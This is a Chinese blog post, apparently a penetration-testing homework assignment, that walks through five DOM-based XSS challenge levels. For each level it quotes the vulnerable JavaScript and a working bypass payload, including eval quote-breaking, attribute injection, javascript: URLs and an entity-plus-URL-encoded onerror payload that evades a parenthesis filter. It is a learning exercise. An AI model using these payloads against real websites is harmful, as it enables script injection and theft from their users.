当前位置: 首页 > news >正文

渗透第三次作业

目录

第一关Ma Spaghet!

第二关Jefff:

第三关:Ugandan Knuckles

第四关:Ricardo Milos

第五关: Ah That's Hawt


第一关Ma Spaghet!
<h2 id="spaghet"></h2>
<script>spaghet.innerHTML = (new URL(location).searchParams.get('somebody') || "Somebody") + " Toucha Ma Spaghet!"
</script>

(new URL(location).searchParams.get('somebody') || "Somebody") + " Toucha Ma Spaghet!" 这里的意思为获取url中的get参数somebody,如果有那么就设置h2的值为get参数的值,如果没有则设置h2的值为Somebody") + " Toucha Ma Spaghet!

(1):当get参数中存在somebody时,h2回显

(2):当get参数中不存在somebody时,h2回显

第二关Jefff:
<h2 id="maname"></h2>
<script>let jeff = (new URL(location).searchParams.get('jeff') || "JEFFF")let ma = ""eval(`ma = "Ma name ${jeff}"`)    ---其中的动作为给变量ma赋值。setTimeout(_ => {maname.innerText = ma}, 1000)
</script>
eval  ---js中的一个执行函数。
setTimeout  ---定时器,上面表示在1秒后执行定时器中的动作。

 尝试闭合双引号,之后在其中闭合单引号。所以我们需要在传递的变量jeff上做。

jeff=asd" ;alert(12);//eval(`ma = "Ma name asd" ;alert(12);//"`)    

我们可以看到,传递的值jeff=asd" ;alert(12);// 时就会弹窗,说明这里存在DOM型xss的漏洞

第三关:Ugandan Knuckles
<div id="uganda"></div>
<script>let wey = (new URL(location).searchParams.get('wey') || "do you know da wey?");wey = wey.replace(/[<>]/g, '')uganda.innerHTML = `<input type="text" placeholder="${wey}" class="form-control">`
</script>

wey = wey.replace(/[<>]/g, '') ----- 过滤了 < 和 > ;

解决方法:

闭合双引号。

wey=asd" onclick="alert(12)

第四关:Ricardo Milos
<!-- Challenge -->
<form id="ricardo" method="GET"><input name="milos" type="text" class="form-control" placeholder="True" value="True">
</form>
<script>ricardo.action = (new URL(location).searchParams.get('ricardo') || '#')setTimeout(_ => {ricardo.submit()}, 2000)
</script>

通过URL中的JavaScript伪协议来执行XSS,URL查询参数ricardo作为注入点

ricardo=javascript:alert(12)

第五关: Ah That's Hawt
<!-- Challenge -->
<h2 id="will"></h2>
<script>smith = (new URL(location).searchParams.get('markassbrownlee') || "Ah That's Hawt")smith = smith.replace(/[\(\`\)\\]/g, '')will.innerHTML = smith
</script>
markassbrownlee=<img src=1 onerror="alert(1)">

传递的参数在url中,所以如果我们直接将(1)进行urlcode编码浏览器传递给smith时会自动解码,但是在url中要遵守url规则,不能直接传递实体编码。

所以我们可以先将(1)进行实体编码,再对实体编码进行urlcode编码

markassbrownlee=<img src=1 onerror="alert(1)">
实体编码:
markassbrownlee=<img src=1 onerror="alert&#x0028;&#x0031;&#x0029;">
urlcode编码:
markassbrownlee=<img src=1 onerror="alert%26%23x0028%3B%26%23x0031%3B%26%23x0029%3B">当参数在url中传递过去后会解码,漏出实体编码,实体编码就可以绕过过滤传递给h2正常执行。

传递参数进去:发现此时就可以进行弹窗了。

http://www.lryc.cn/news/426929.html

相关文章:

  • Python自动化:解锁高效工作与生产力的密钥
  • Sentinel1.8.1 控制台改造
  • 设计模式(2)行为型模式和七大原则
  • 学懂C++(三十一):高级教程——深入详解C++高级多线程编程技术之锁优化与替代
  • Linux - 基础工具使用
  • 理解线程id和简单封装原生线程库
  • Unified 阻抗控制 architecture、framework、approach
  • Java后端面试题(mq相关)(day9)
  • 算法-华为OD机试-识别有效的IP地址和掩码并进行分类统计
  • 钉钉开发网页应用JSAPI前端授权鉴权nodejs实现
  • uniapp 自定义全局弹窗
  • element+-ui图片无法使用--安装
  • Python编码系列—Python ORM(对象关系映射):高效数据库编程实践
  • 一次日志记录中使用fastjson涉及到ByteBuffer的教训
  • 掌握TCP连接管理与流量控制:从零开始
  • python提取b站视频的音频(提供源码
  • 嵌入式Linux ,QT5 鼠标键盘设备参数指定环境变量的方法
  • C语言钥匙迷宫2.0
  • 【多线程】初步认识Thread类及其应用
  • algorithm算法库学习之——划分操作和排序操作
  • XSS实验记录
  • Cortex-A7的GIC(全局中断控制器)使用方法(7):基于stm32MP135的GIC配置中断效果测试
  • c++动态数组new和delete
  • Redis热点知识速览(redis的数据结构、高性能、持久化、主从复制、集群、缓存淘汰策略、事务、Pub/Sub、锁机制、常见问题等)
  • 【C++浅析】lambda表达式:基本结构 使用示例
  • 利用Redis获取权限的多种方式
  • LeetCode - LCR 146- 螺旋遍历二维数组
  • 如何获取Bing站长工具API密钥
  • NC 调整数组顺序使奇数位于偶数前面(一)
  • Unity异步把图片数据从显存下载到内存(GPU->CPU)